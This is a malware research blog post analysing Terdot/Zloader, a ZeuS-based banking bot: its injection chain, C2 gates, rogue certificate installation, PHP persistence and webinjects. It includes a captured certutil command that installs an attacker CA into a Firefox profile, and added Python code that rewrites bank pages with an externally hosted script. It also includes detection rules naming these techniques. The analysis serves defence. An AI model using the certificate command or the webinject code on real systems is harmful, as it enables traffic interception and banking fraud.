Source: https://www.malwarebytes.com/blog/news/2017/01/zbot-with-legitimate-applications-on-board
ZBOT WITH LEGITIMATE APPLICATIONS ON BOARD

Posted: January 26, 2017 by Malwarebytes Labs

The source code of the infamous ZeuS malware leaked in 2011. Since then, many cybercriminals have adopted it and augmented it with their own ideas. Recently, among the payloads delivered by exploit kits, we often find Terdot.A/Zloader, a downloader that installs ZeuS-based malware on the victim machine. The payload is very similar to the malware described in this article (linked in the original post) and referenced under the name Sphinx.
However, after consulting with other researchers (special thanks to Matthew Mesa), it was confirmed that the bot sold as Sphinx is a very different thing (sample). Since there is much confusion about the naming, we decided to stick to the name Terdot Zloader/Zbot. In this post we will have a look at the features and internals of this malware. As we will see, the dropped package consists not only of malicious files but also of legitimate applications, used for a malicious purpose.

ANALYZED SAMPLE

* d45b8a20a991acd01d2ff63735fc1adf - original executable #1
* 950368afb934fd3fd5b2d4e6704b757b - original executable #2
* fca092aca679edd9564d00e9640f939d - original executable #3
  * ae1d1f4597f76912d7bd9962b96eecbb - loader (unpacked)
  * 268fd83403da27a80ab1a3cf9ac45b67 - payload.dll (injected into explorer)
  * 6c34779503414210378371d250a3a1af - client32.dll (Zbot, downloaded and injected into msiexec and into browsers)
* f9373dc232028da52ad33b017e33bbd3 - original executable #4

DISTRIBUTION

Most of the analyzed samples were dropped by SundownEK; some of the campaigns are described in detail in the posts of 28 Dec 2016, 6 Jan 2017 and 18 Jan 2017 (linked in the original post). However, we also encountered cases where Terdot.A/Zloader was delivered as a malicious email attachment.

BEHAVIORAL ANALYSIS

After the sample is run, we can see it deploying explorer and then terminating. It is easy to guess that it injected some malicious modules there. If we attach a debugger to the explorer process, we can see the injected shellcode along with a new PE file (payload.dll). An interesting and unusual detail, typical for this Zloader, is that the DLL does not start at the beginning of the memory page but after the shellcode. A memory scanner that only looks for an MZ header at the start of a region or page will therefore miss this module; the PE header has to be searched for at arbitrary offsets inside the allocation.

If an internet connection is available, the Zloader loads the second stage (the main bot) and injects it into msiexec.exe. The injected module beacons to the CnC and downloads other modules.
Observed patterns of the gates:

/FE8hVs3/gs98h.php
/bdk/gate.php

The communication is encrypted. The CnC responds with a new PE file, the module client32.dll. The downloader decrypts it in memory and injects it further: after a while we can see explorer terminating and another program being deployed, msiexec. The initial malware executable is deleted. Attaching a debugger to msiexec, we find the Zbot (client32.dll) implanted and running in its process space. From inside the injected module another internet connection is made, and new elements are downloaded and dropped, including the legitimate applications certutil and php (their role is described below). The same client32.dll is also injected into browsers. The module deployed inside msiexec.exe acts as a supervisor: it opens local TCP sockets and communicates with the modules injected into the browsers in order to monitor the pages they open.

MITM

The main module of the bot downloads and drops new elements into the %TEMP% folder. Surprisingly, those files are not malware. We can see the certutil application (0c6b43c9602f4d5ac9dcf907103447c4) along with its dependencies, legitimate DLLs. From the command-line syntax (-A, -n, -t, -d) this is the NSS certutil tool that ships with Mozilla's NSS libraries, not the certutil.exe built into Windows. In the same folder there is also an alien certificate (its file name, as well as the issuer name, is randomly generated). The certificate is installed with the help of certutil, for the purpose of Man-in-the-Middle attacks on the browser's TLS traffic (in this setting also called Man-in-the-Browser). An example command line captured during tests:

"C:\Users\tester\AppData\Local\Temp\certutil.exe" -A -n "otdarufyr" -t "C,C,C" -i "C:\Users\tester\AppData\Local\Temp\nedea.crt" -d "C:\Users\tester\AppData\Roaming\Mozilla\Firefox\Profiles\be7dt337.default"

Here -A adds the certificate under the nickname "otdarufyr", -d points at the Firefox profile's own NSS certificate database (cert8.db at the time; Firefox did not consult the Windows certificate store by default), and the trust string "C,C,C" marks it as a trusted CA for SSL server certificates, e-mail and object signing. Nothing is written to the Windows certificate store, so checking certmgr.msc alone will not reveal it; look in the Firefox Certificate Manager under Authorities, or inspect the profile's NSS database directly.

It is easy to guess that this malware targets web browsers. Indeed, if we run a browser and try to visit a site over HTTPS, we see that the original certificates are replaced by the malicious one.
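The certutil command above and the PHP autostart described under PERSISTENCE below are both cases of a legitimate tool doing the malicious work, so a detection has to key on how the tool is used rather than on a file hash. The following is an added example, not code from the original post: three checks run over constructed Sysmon-style process-creation events. The field names (Image, ParentImage, CommandLine) follow Sysmon Event ID 1; the sample events, the random folder name Ymqazo and the script name script.php are constructed for this example (only the certutil command line mirrors the one quoted above), and the check for the built-in Windows certutil -addstore form is a generalisation the post does not show.

```python
import re

# Field names follow Sysmon Event ID 1 (process creation).  Every event below is
# constructed for this example; only the certutil command line mirrors the post.
USER_WRITABLE = re.compile(r"\\AppData\\(?:Local\\Temp|Roaming)\\", re.IGNORECASE)
MOZ_PROFILE = re.compile(r"\\Mozilla\\Firefox\\Profiles\\", re.IGNORECASE)


def tokenize(cmdline):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def option_value(args, flag):
    """Value following `flag` (flag given in lower case), or None."""
    for i, a in enumerate(args[:-1]):
        if a.lower() == flag:
            return args[i + 1]
    return None


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rogue_ca_install(event):
    """certutil used to make a certificate a trusted CA in a browser or system store."""
    if basename(event["Image"]) != "certutil.exe":
        return None
    args = tokenize(event["CommandLine"])
    flags = {a.lower() for a in args[1:] if a.startswith("-")}
    # NSS certutil form (the one in the post): -A adds, -t sets trust, -d is the NSS db.
    # The first trust field covers SSL; "C" or "T" there makes it a trusted CA for TLS.
    if "-a" in flags and "-t" in flags:
        ssl_trust = (option_value(args, "-t") or "").split(",")[0]
        db = option_value(args, "-d") or ""
        if any(c in ssl_trust for c in "CT") and MOZ_PROFILE.search(db):
            origin = "dropped copy" if USER_WRITABLE.search(event["Image"]) else "system copy"
            return "NSS certutil (%s) adds TLS-trusted CA %r to a Firefox profile" % (
                origin, option_value(args, "-n"))
    # Built-in Windows certutil form; a generalisation beyond what the post shows.
    pos = [i for i, a in enumerate(args) if a.lower() == "-addstore"]
    if pos:
        rest = [a for a in args[pos[0] + 1:] if not a.startswith("-")]
        if rest and rest[0].lower() in ("root", "ca", "authroot"):
            return "Windows certutil adds a certificate to the %s store" % rest[0]
    return None


def interpreter_persistence(event):
    """A scripting interpreter dropped into a user-writable folder and started with a script."""
    if basename(event["Image"]) != "php.exe" or not USER_WRITABLE.search(event["Image"]):
        return None
    scripts = [a for a in tokenize(event["CommandLine"])[1:] if a.lower().endswith(".php")]
    if scripts:
        return "php.exe from %s runs %s (parent %s)" % (
            event["Image"], basename(scripts[0]), basename(event.get("ParentImage", "")))
    return None


def argless_msiexec(event):
    """msiexec.exe started with nothing to install: a convenient host for an injected module.
    The Windows Installer service instance starts as 'msiexec.exe /V' and is not matched."""
    if basename(event["Image"]) != "msiexec.exe":
        return None
    if len(tokenize(event["CommandLine"])) == 1:
        return "msiexec.exe started without arguments by %s" % basename(event.get("ParentImage", ""))
    return None


RULES = (rogue_ca_install, interpreter_persistence, argless_msiexec)


def scan(events):
    """Return (event index, rule name, reason) for every rule that fires."""
    hits = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            reason = rule(ev)
            if reason:
                hits.append((idx, rule.__name__, reason))
    return hits


SAMPLE_EVENTS = [
    {"Image": r"C:\Users\tester\AppData\Local\Temp\certutil.exe",            # the post's command line
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'"C:\Users\tester\AppData\Local\Temp\certutil.exe" -A -n "otdarufyr" -t "C,C,C" '
                    r'-i "C:\Users\tester\AppData\Local\Temp\nedea.crt" '
                    r'-d "C:\Users\tester\AppData\Roaming\Mozilla\Firefox\Profiles\be7dt337.default"'},
    {"Image": r"C:\Users\tester\AppData\Roaming\Ymqazo\php.exe",             # startup link (constructed names)
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Users\tester\AppData\Roaming\Ymqazo\php.exe" "C:\Users\tester\AppData\Roaming\Ymqazo\script.php"'},
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\msiexec.exe"'},                   # injection host
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\msiexec.exe /V"},                  # benign: installer service
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -dump C:\temp\site.cer"},                     # benign: admin use
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -addstore -f Root C:\Users\tester\AppData\Local\Temp\evil.cer"},
]

if __name__ == "__main__":
    for idx, rule, reason in scan(SAMPLE_EVENTS):
        print("event %d  %-24s %s" % (idx, rule, reason))
```

The NSS rule deliberately fires for a system copy of certutil too: the tool's location is a strong signal (the post shows it dropped into %TEMP%), but a CA-trusted addition to a browser profile is worth a look wherever the binary lives.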
In the examples below (screenshots in the original post), note that the subject of the certificate contains the valid domain; only the issuer field lets us recognize that the certificate is not legitimate.

Santander MitB on Firefox: the browser claims that the connection is secure, but when we look at the details we find that the connection is "protected" by the fake certificate dropped by the malware.

Facebook MitB on Internet Explorer: the browser does not alert about any inconsistency, and a user who is not vigilant enough to check the details of the certificate may easily be deceived.

If we attach a debugger to the running browser, we can see that the same client32.dll is injected there, along with some more code used for API redirections.

PERSISTENCE

In addition to the content dropped in %TEMP%, we can see new folders with random names created in %APPDATA%. Interestingly, one of them contains a legitimate php.exe (see on VirusTotal: php.exe, php5ts.dll) and some obfuscated PHP code: https://gist.github.com/hasherezade/1952374847712805c4f7199b7423dd27#file-script-php (a formatted version is linked in the original post). Other folders contain encrypted data.

This php package is referenced at autostart: the link runs the dropped php application with the script we saw before. We can easily suspect that this is a method of persistence, and deobfuscating the PHP code confirms it. See the same code after cleanup: https://gist.github.com/hasherezade/1952374847712805c4f7199b7423dd27#file-deobfuscated-php

As we can see, the file royxh.umh contains the encrypted code of the malware. Using the PHP script, it is decrypted back into the Zloader executable (fca092aca679edd9564d00e9640f939d). The dropped file is run and then deleted. Since the executable exists on disk only briefly, a signature scan of %APPDATA% sees nothing but a clean PHP interpreter and an opaque data file; the persistence is easier to spot from the startup entry that points to php.exe in a user-writable folder.

INSIDE ZLOADER - PAYLOAD.DLL

This element, unpacked from the initial sample and injected into explorer.exe, is a downloader, identified as Terdot.A/Zloader.
It is responsible for connecting to the CnC and downloading the main malicious module, the Zbot.

ZBOT - CLIENT32.DLL

The second stage is also a DLL; this time it is injected into msiexec.exe as well as into browsers.

ATTACKED TARGETS

The bot injects itself into the most popular browsers in order to hook their API. It excludes computers with the Russian language installed from the attack, but instead of doing so silently, like most malware, it very openly announces this fact (see the screenshot in the original post).

THE SQL PART

Inside the bot we can find references to an SQLite release from the end of 2016 (see SQLite Release 3.15.1 on 2016-11-04):

2016-11-04 12:08:49 1136863c76576110e710dd5d69ab6bf347c65e36

This is the source id string that the SQLite library embeds at build time, so its presence confirms that the bot is fairly new and probably under active development. We can also see many SQL queries and related error messages among the strings. They are used to read and manipulate browser cookies, which are stored as SQLite databases. The queries deployed are shown in a screenshot in the original post.

MAN-IN-THE-BROWSER

The main module injected into msiexec opens local TCP sockets that are used to communicate with the module injected into the browser. All communication between the browser and a given website is first passed through the client32.dll instance injected into msiexec. Like many Zbots, Terdot not only spies but also modifies the displayed content, by means of "WebInjects" and "WebFakes". The sites to be hooked are specified by configuration. An example target list from one of the samples shows that the main interest of the attackers is various banks: https://gist.github.com/hasherezade/4db462af582c079b0ffa059b1fd2c465#file-targets-txt

Webinjects are implemented by adding malicious scripts (specialized for a specific target) into the content of the website. The scripts are hosted on a server controlled by the attackers.
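To make the webinject mechanism concrete, here is an added example, not code from the original post and not Terdot's own implementation: a parser for the classic ZeuS webinject configuration format (set_url / data_before / data_inject / data_after / data_end) and the page rewrite it drives. That Terdot's configuration uses exactly this layout is an assumption; the URL masks, the attacker-hosted script at static.example and the page HTML are all constructed for the example.

```python
import re

# Classic ZeuS webinject syntax.  Assumption: Terdot's config uses the same layout.
# The masks, the script host static.example and the HTML below are constructed.
SAMPLE_CONFIG = """
set_url https://www.bank.example/login* GP
data_before
</title>
data_end
data_inject
<script src="https://static.example/js/x.js"></script>
data_end
data_after
data_end

set_url https://www.bank.example/accounts* G
data_before
<span id="balance">
data_end
data_inject
1,000.00
data_end
data_after
</span>
data_end
"""

LOGIN_HTML = ('<html><head><title>Login</title></head>'
              '<body><form action="/login" method="post"></form></body></html>')
ACCOUNTS_HTML = ('<html><head><title>Accounts</title></head>'
                 '<body>Balance: <span id="balance">1,234.56</span></body></html>')


def parse_webinjects(text):
    """Parse set_url entries; each data_* block runs until the next data_end line.
    Flags after the mask select the request methods (G = GET, P = POST)."""
    entries, current, block = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("set_url"):
            _, mask, flags = (line.split(None, 2) + [""])[:3]
            current = {"mask": mask, "flags": flags.upper(), "before": "", "inject": "", "after": ""}
            entries.append(current)
        elif line in ("data_before", "data_inject", "data_after"):
            block = line[5:]                      # "before" / "inject" / "after"
        elif line == "data_end":
            block = None
        elif current is not None and block is not None:
            current[block] = line if not current[block] else current[block] + "\n" + line
    return entries


def mask_matches(mask, url):
    """ZeuS-style URL mask: '*' matches any run of characters, compared case-insensitively."""
    pattern = ".*".join(re.escape(part) for part in mask.split("*"))
    return re.fullmatch(pattern, url, re.IGNORECASE) is not None


def apply_webinjects(url, method, html, entries):
    """Apply every entry whose mask and method match.  The text between data_before and
    data_after is replaced by data_inject; with an empty data_after the inject is simply
    placed right after data_before.  Returns (rewritten html, masks that fired)."""
    out, fired = html, []
    for e in entries:
        if not mask_matches(e["mask"], url) or method[:1].upper() not in e["flags"]:
            continue
        start = out.find(e["before"]) if e["before"] else 0
        if start < 0:
            continue                               # anchor not on this page
        start += len(e["before"])
        end = out.find(e["after"], start) if e["after"] else start
        if end < 0:
            continue
        out = out[:start] + e["inject"] + out[end:]
        fired.append(e["mask"])
    return out, fired


if __name__ == "__main__":
    injects = parse_webinjects(SAMPLE_CONFIG)
    for url, method, page in (("https://www.bank.example/login?lang=en", "GET", LOGIN_HTML),
                              ("https://www.bank.example/accounts", "GET", ACCOUNTS_HTML),
                              ("https://www.news.example/", "GET", LOGIN_HTML)):
        rewritten, fired = apply_webinjects(url, method, page, injects)
        print(url, fired)
        print("  ", rewritten)
```

The second entry is a WebFake in the post's terminology: no script is added, the displayed balance is simply rewritten. Because the substitution happens on the decrypted response inside the browser process, the attacker controls the bytes the browser parses, headers included, so CSP and SRI, which the victim's own browser would have to enforce, cannot be relied on against it; the catch has to come from the server side, for example out-of-band confirmation of transactions.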
A sample list of the scripts fetched by the bot during tests: https://gist.github.com/hasherezade/4db462af582c079b0ffa059b1fd2c465#file-injects-txt

Those JavaScript files are implanted into the attacked site before it is displayed in the browser, along with some more obfuscated code. Templates of such implants are downloaded from the CnC server. Some examples are linked in the original post.

CONCLUSION

Terdot is yet another bot based on ZeuS. Feature-wise it is similar to other bankers. However, I think it deserves some attention because of its recent popularity. It has been prepared with attention to detail, so we may suspect that it is the work of professionals. It is actively developed, distributed and maintained, so the probability is high that we will be seeing more of it in the future.

--------------------------------------------------------------------------------

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going into the details of malware and sharing threat information with the community. Check her out on Twitter @hasherezade and on her personal blog: https://hshrzd.wordpress.com.